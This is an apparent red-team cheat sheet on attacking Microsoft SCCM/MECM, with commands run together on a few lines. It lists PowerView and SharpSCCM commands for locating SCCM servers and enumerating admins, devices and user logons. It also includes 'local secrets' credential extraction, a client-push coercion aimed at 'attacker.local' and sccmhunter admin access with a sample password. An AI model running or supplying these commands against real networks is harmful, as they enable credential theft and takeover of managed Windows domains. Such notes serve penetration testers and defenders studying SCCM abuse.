System Center Configuration Manager / Microsoft Endpoint Configuration Manager
Last updated
Cmd > tasklist | findstr CcmExecPV3 > Get-DomainComputer -LDAPFilter "(&(objectClass=computer)(cn=*sccm*))" | select -ExpandProperty dnsHostName
PV3 > Get-DomainComputer | ? {$_.Name -like "*sccm*"} | select -ExpandProperty dnsHostNameCmd > SharpSCCM.exe local site-infoCmd > SharpSCCM.exe get admins -sms <SMS> -sc <SC>Cmd > SharpSCCM.exe get class-instances -sms <SMS> -sc <SC> SMS_R_System -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -w "LastLogonUserName LIKE '%snovvcrash%'"
Cmd > SharpSCCM.exe get devices -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -u [email protected]Cmd > SharpSCCM.exe get resource-id -sms <SMS> -sc <SC> -d <RESOURCE>Cmd > SharpSCCM.exe invoke admin-service -sms <SMS> -sc <SC> -q "EventLog('Security',4h) | where EventID == 4624 | order by DateTime desc" -r <ID>Cmd > SharpSCCM.exe local secrets -m diskCmd > SharpSCCM.exe invoke client-push -t attacker.local$ pipx install -f "git+https://github.com/garrettfoster13/sccmhunter.git"$ sccmhunter.py admin -u sccm_admin -p 'Passw0rd!' -ip SCCM.megacorp.local
$ get_lastlogon administrator